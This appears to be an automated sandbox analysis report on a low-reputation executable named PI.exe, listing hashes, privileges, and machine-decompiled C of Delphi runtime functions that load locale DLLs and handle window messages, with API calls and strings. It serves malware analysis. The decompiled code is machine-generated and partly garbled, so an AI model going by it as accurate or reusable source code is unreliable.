Commandline:	'C:\Users\user\Desktop\PI.exe' 2 6728 5209890
Imagebase:	0x400000
File size:	987648 bytes
MD5 hash:	DBDA32339A6965FEFC794F220F944016
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: PI.exe PID: 6512 Parent PID: 5976 PI.exeCOMMON

Executed Functions

Function 00405CA0, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00405CA0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x405da5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00405AE8( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405F0C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00405DAC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401338();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401340();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401338();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401338();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401338();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

0x00405ca1
0x00405ca3
0x00405cab
0x00405cbc
0x00405cc1
0x00405cda
0x00405ce1
0x00405d23
0x00405d25
0x00405d26
0x00405d2b
0x00405d2e
0x00405d31
0x00405d43
0x00405d66
0x00405d86
0x00405d86
0x00405d8a
0x00405d90
0x00405d93
0x00405d96
0x00405da4
0x00405ce3
0x00405cf8
0x00405cff
0x00000000
0x00405d01
0x00405d16
0x00405d1d
0x00405dac
0x00405db4
0x00405dbb
0x00405dbc
0x00405dcf
0x00405dd4
0x00405ddd
0x00405df3
0x00405df9
0x00405dfa
0x00405e07
0x00405e0c
0x00405e0b
0x00405e0b
0x00405e1b
0x00405e23
0x00405e29
0x00405e2e
0x00405e3b
0x00405e3f
0x00405e40
0x00405e41
0x00405e56
0x00405e56
0x00405e5a
0x00405e73
0x00405e77
0x00405e78
0x00405e79
0x00405e89
0x00405e8e
0x00405e92
0x00405e94
0x00405ea9
0x00405ead
0x00405eae
0x00405eaf
0x00405ebf
0x00405ec4
0x00405ec4
0x00405e92
0x00405e5a
0x00405e23
0x00405ecd
0x00000000
0x00000000
0x00000000
0x00405d1d
0x00405cff

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047608C,?,00405A90,00400000,?,00000105,00000001,004104AC,00405ACC,00406578,0000FF99,?), ref: 00405CBC
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047608C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047608C), ref: 00405CF8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF

Strings

Software\Borland\Delphi\Locales, xrefs: 00405D0C
Software\Borland\Locales, xrefs: 00405CD0, 00405CEE

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
Instruction ID: 04e7f70bc9d5a93712b3d4866678576dafef9722c20d67039ec14452820f7b6a
Opcode Fuzzy Hash: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
Instruction Fuzzy Hash: D2516D71A4060C7AFB21D6A4CC46FEFBAACDB04744F5041B7BA44F65C1E6789E448FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00454858, Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00454858(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t245;
				struct HWND__* _t249;
				struct HWND__* _t251;
				struct HWND__* _t252;
				struct HWND__* _t264;
				intOrPtr _t267;
				struct HWND__* _t270;
				intOrPtr* _t271;
				struct HWND__* _t279;
				struct HWND__* _t281;
				struct HWND__* _t292;
				void* _t301;
				signed int _t303;
				struct HWND__* _t309;
				struct HWND__* _t310;
				struct HWND__* _t311;
				void* _t312;
				intOrPtr _t335;
				struct HWND__* _t339;
				intOrPtr _t361;
				void* _t365;
				struct HWND__* _t370;
				void* _t371;
				void* _t372;
				intOrPtr _t373;

				_t312 = __ecx;
				_push(_t365);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t372);
				_push(0x454ee8);
				_push( *[fs:edx]);
				 *[fs:edx] = _t373;
				 *(_v12 + 0xc) = 0;
				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t301 < 0) {
					L5:
					E0045470C(_v8, _t312, _v12);
					_t303 =  *_v12;
					_t161 = _t303;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L99:
									_t166 = 0;
									_pop(_t335);
									 *[fs:eax] = _t335;
									goto L100;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E004567B0(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
								} else {
									L98:
									E004547D0(_t372); // executed
								}
								goto L99;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E00455454(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E004553F8(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L99;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t339 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
										_t191 = E0044C778(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L99;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L88:
								E00455938(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t367 = _t197;
								_t199 = E0043C1F4(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0043C1F4(_t367));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0043C1F4(_t367));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x476b48 = 0;
											_t206 = GetFocus();
											SetFocus(E0043C1F4(_t367));
											E00436D28(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x476b48 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L99;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0xf2));
								if( *((short*)(_t217 + 0xf2)) != 0) {
									 *((intOrPtr*)(_v8 + 0xf0))();
								}
								goto L99;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E004552D0(_v8, _t312, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0xfa));
							if( *((short*)(_t224 + 0xfa)) != 0) {
								 *((intOrPtr*)(_v8 + 0xf8))();
							}
							goto L99;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E00454F4C(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E00454FFC(_v8);
								} else {
									E004547D0(_t372);
								}
							}
							goto L99;
						}
						__eflags = _t227 + 0xffffffe0 - 7;
						if(_t227 + 0xffffffe0 - 7 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						goto L88;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t245 = _t161 - 0x37;
							__eflags = _t245;
							if(_t245 == 0) {
								 *(_v12 + 0xc) = E00454F30(_v8);
								goto L99;
							}
							__eflags = _t245 == 0x13;
							if(_t245 == 0x13) {
								_t249 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
									_t251 = _v8;
									__eflags =  *((char*)(_t251 + 0x9e));
									if( *((char*)(_t251 + 0x9e)) != 0) {
										_t252 = _v8;
										__eflags =  *(_t252 + 0xa0);
										if( *(_t252 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t309 = E0040BBA4("vcltest3.dll", _t303, 0x8000);
											 *(_v8 + 0xa0) = _t309;
											__eflags = _t309;
											if(_t309 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t310 = _t370;
												__eflags = _t370;
												if(_t370 != 0) {
													_t264 =  *(_v12 + 8);
													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
												}
											}
										}
									}
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t267 =  *0x492c08; // 0x241094c
							E00453D74(_t267);
							E004547D0(_t372);
							goto L99;
						}
						_t270 = _t161 - 0x1a;
						__eflags = _t270;
						if(_t270 == 0) {
							_t271 =  *0x491244; // 0x492b6c
							E004408B4( *_t271, _t312,  *(_v12 + 4));
							E00454764(_v8, _t303, _t312, _v12, _t365);
							E004547D0(_t372);
							goto L99;
						}
						__eflags = _t270 == 2;
						if(_t270 == 2) {
							E004547D0(_t372);
							_t279 = _v12;
							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
							_t281 = _v12;
							__eflags =  *(_t281 + 4);
							if( *(_t281 + 4) == 0) {
								E00454660();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E00454670(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						_t292 = _v12;
						__eflags =  *(_t292 + 4);
						if( *(_t292 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L99;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L98;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M004548FC))) {
						case 0:
							__eax = E0041C04C();
							goto L99;
						case 1:
							goto L98;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L004070D4();
							__eax = E004547D0(__ebp);
							goto L99;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E004547D0(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0044C628( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00454668();
							} else {
								_v8 = E00454670(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E004547D0(__ebp);
							}
							goto L99;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L00407034();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E004547D0(__ebp);
							} else {
								__eax = E0045480C(__ebp);
							}
							goto L99;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00451FDC(__eax, __ecx);
							}
							goto L99;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E004547D0(__ebp);
							goto L99;
					}
				} else {
					_t311 = _t301 + 1;
					_t371 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E004141BC( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t361);
						 *[fs:eax] = _t361;
					}
					L100:
					return _t166;
					L4:
					_t371 = _t371 + 1;
					_t311 = _t311 - 1;
					__eflags = _t311;
					if(_t311 != 0) {
						goto L2;
					}
					goto L5;
				}
			}

0x00454858
0x0045485f
0x00454861
0x00454864
0x00454869
0x0045486a
0x0045486f
0x00454872
0x0045487a
0x00454889
0x0045488c
0x004548c0
0x004548c6
0x004548ce
0x004548d0
0x004548d2
0x004548d5
0x00454989
0x0045498e
0x004549d4
0x004549d9
0x004549fa
0x004549fa
0x004549ff
0x00454e6c
0x00454e6f
0x00454e73
0x00454e8f
0x00454e75
0x00454e81
0x00454e81
0x00454ede
0x00454ede
0x00454ee0
0x00454ee3
0x00000000
0x00454ee3
0x00454a08
0x00454a0b
0x00454cca
0x00454a11
0x00454ed7
0x00454ed8
0x00454edd
0x00000000
0x00454a0b
0x004549db
0x00454e36
0x00454e39
0x00454e3d
0x00454e65
0x00454e3f
0x00454e4d
0x00454e4d
0x00000000
0x00454e3d
0x004549e1
0x004549e1
0x004549e6
0x00454de4
0x00454de9
0x00454deb
0x00454df1
0x00454df6
0x00454df9
0x00454dfc
0x00454e04
0x00454e09
0x00454e0b
0x00454e12
0x00454e12
0x00454e0b
0x00454dfc
0x00000000
0x00454deb
0x004549ec
0x004549ef
0x00454e1c
0x00454e2c
0x00000000
0x004549f5
0x00000000
0x004549f5
0x004549ef
0x00454990
0x00454cf7
0x00454cfa
0x00454cfc
0x00454d02
0x00454d06
0x00454d0b
0x00454d0d
0x00454d1b
0x00454d20
0x00454d22
0x00454d30
0x00454d35
0x00454d37
0x00454d3d
0x00454d44
0x00454d53
0x00454d6c
0x00454d72
0x00454d77
0x00454d81
0x00454d81
0x00454d37
0x00454d22
0x00454d0d
0x00000000
0x00454cfc
0x00454996
0x0045499b
0x004549bb
0x004549bb
0x004549c0
0x00454db5
0x00454db8
0x00454dc0
0x00454dd2
0x00454dd2
0x00000000
0x00454dc0
0x004549c6
0x004549c9
0x00454cd8
0x00454cdd
0x00454cdf
0x00454ce8
0x00454ce8
0x00000000
0x004549cf
0x00000000
0x004549cf
0x004549c9
0x0045499d
0x00454d8d
0x00454d90
0x00454d98
0x00454daa
0x00454daa
0x00000000
0x00454d98
0x004549a3
0x004549a3
0x004549a8
0x00454a21
0x00454a21
0x00454a26
0x00454a34
0x00454a28
0x00454a28
0x00454a2d
0x00454a41
0x00454a2f
0x00454a4c
0x00454a51
0x00454a2d
0x00000000
0x00454a26
0x004549ad
0x004549b0
0x00454bd9
0x00000000
0x004549b6
0x00000000
0x004549b6
0x004549b0
0x004548db
0x00000000
0x00000000
0x004548e1
0x004548e4
0x00454950
0x00454953
0x00454972
0x00454972
0x00454975
0x00454ab7
0x00000000
0x00454ab7
0x0045497b
0x0045497e
0x00454bfd
0x00454c03
0x00454c09
0x00454c0f
0x00454c12
0x00454c19
0x00454c1f
0x00454c22
0x00454c29
0x00454ca9
0x00454c2b
0x00454c3a
0x00454c3f
0x00454c45
0x00454c47
0x00454c91
0x00454c99
0x00454c49
0x00454c4e
0x00454c65
0x00454c67
0x00454c69
0x00454c6b
0x00454c74
0x00454c82
0x00454c82
0x00454c6b
0x00454c47
0x00454c29
0x00454c19
0x00000000
0x00454984
0x00000000
0x00454984
0x0045497e
0x00454955
0x00454ebd
0x00454ec2
0x00454ec8
0x00000000
0x00454ecd
0x0045495b
0x0045495b
0x0045495e
0x00454e9d
0x00454ea4
0x00454eaf
0x00454eb5
0x00000000
0x00454eba
0x00454964
0x00454967
0x00454ae1
0x00454ae7
0x00454aea
0x00454aee
0x00454af4
0x00454afa
0x00454afd
0x00454b01
0x00454b28
0x00454b3d
0x00454b03
0x00454b06
0x00454b1b
0x00454b1b
0x00000000
0x0045496d
0x00000000
0x0045496d
0x00454967
0x004548e6
0x00454be1
0x00454be4
0x00454be8
0x00454bf1
0x00454bf1
0x00000000
0x00454be8
0x004548ec
0x004548ef
0x00000000
0x00000000
0x004548f5
0x00000000
0x00454ed0
0x00000000
0x00000000
0x00000000
0x00000000
0x00454abf
0x00454ac1
0x00454ac3
0x00454acb
0x00454ace
0x00454acf
0x00454ad5
0x00000000
0x00000000
0x00454b47
0x00454b4a
0x00454b4e
0x00454b82
0x00454b88
0x00454b8b
0x00454b92
0x00454b94
0x00454b97
0x00454b9a
0x00454b9f
0x00454ba2
0x00454ba2
0x00454bab
0x00454b50
0x00454b53
0x00454b58
0x00454b5b
0x00454b61
0x00454b63
0x00454b6a
0x00454b6d
0x00454b6d
0x00454b6f
0x00454b6f
0x00454b76
0x00454b7b
0x00000000
0x00000000
0x00454a6f
0x00454a72
0x00454a75
0x00454a76
0x00454a7b
0x00454a7d
0x00454a8c
0x00454a7f
0x00454a80
0x00454a85
0x00000000
0x00000000
0x00454a57
0x00454a5a
0x00454a5d
0x00454a5f
0x00454a65
0x00454a65
0x00000000
0x00000000
0x00454a97
0x00454a9a
0x00454aa1
0x00000000
0x00000000
0x0045488e
0x0045488e
0x0045488f
0x00000000
0x00454891
0x004548ad
0x00000000
0x004548af
0x004548af
0x004548b1
0x004548b4
0x004548b4
0x00454efd
0x00454f03
0x004548bc
0x004548bc
0x004548bd
0x004548bd
0x004548be
0x00000000
0x00000000
0x00000000
0x004548be

Strings

RegisterAutomation, xrefs: 00454C51
l+I, xrefs: 00454E9D
vcltest3.dll, xrefs: 00454C30

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RegisterAutomation$l+I$vcltest3.dll
API String ID: 0-4006344421
Opcode ID: 551802912116d392e2c24e73020adaaa035bafcefbe6d28391d05005abe235d2
Instruction ID: ce7447678082689d4ce0267b8534b48c9ee2a8186bb98f6d1640a9c28f0ad015
Opcode Fuzzy Hash: 551802912116d392e2c24e73020adaaa035bafcefbe6d28391d05005abe235d2
Instruction Fuzzy Hash: 8BE16034604508EFDB10DB59C58AA5EB7F1BB84319F1481AAEC049F357C738EE89DB49

Uniqueness

Uniqueness Score: -1.00%

Function 00405DAC, Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00405DAC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401338();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401340();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401338();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401338();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401338();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}

0x00405dac
0x00405db4
0x00405dbb
0x00405dbc
0x00405dcf
0x00405dd4
0x00405ddd
0x00405ec6
0x00405ecd
0x00405df3
0x00405df3
0x00405df9
0x00405dfa
0x00405e07
0x00405e0c
0x00405e0f
0x00405e0b
0x00000000
0x00405e0b
0x00405e1b
0x00405e23
0x00405e29
0x00405e2e
0x00405e3b
0x00405e3f
0x00405e40
0x00405e41
0x00405e56
0x00405e56
0x00405e5a
0x00405e73
0x00405e77
0x00405e78
0x00405e79
0x00405e89
0x00405e8e
0x00405e92
0x00405e94
0x00405ea9
0x00405ead
0x00405eae
0x00405eaf
0x00405ebf
0x00405ec4
0x00405ec4
0x00405e92
0x00405e5a
0x00000000
0x00405e23

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
